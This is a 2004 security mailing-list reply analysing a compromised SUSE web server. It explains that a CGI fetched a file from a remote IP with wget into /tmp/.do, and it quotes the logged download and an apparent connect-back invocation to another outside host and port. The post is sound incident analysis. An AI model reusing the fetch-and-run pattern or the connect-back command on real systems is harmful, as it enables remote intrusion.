[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[suse-security] Re: Backdoor over http(s)??



On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:

> I have found in /var/log/httpd/error.log
> 
> --09:06:43--  http://218.234.171.84/manual/.x/rhs
>            => `/tmp/.do'

Some CGI at your webserver did run wget to receive some file from
218.234.171.84 and save it on your disc as "/tmp/.do".
wwwrun:nogroup are standard user and group used for apache.

The file is still avaiable from http://218.234.171.84/manual/.x/rhs
I don't want to execute it, but strings does list some information:

usage: %s <IP or hostname> <port>

(/tmp/.do 163.17.51.8 9090)


> connect error

probably a error message printed by /tmp/.do.

The server at 218.234.171.84 identifies itself as Apache/1.3.9 (Old!)



-- 
Stefan Tichy <listuser@xxxxxxxxx>

-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here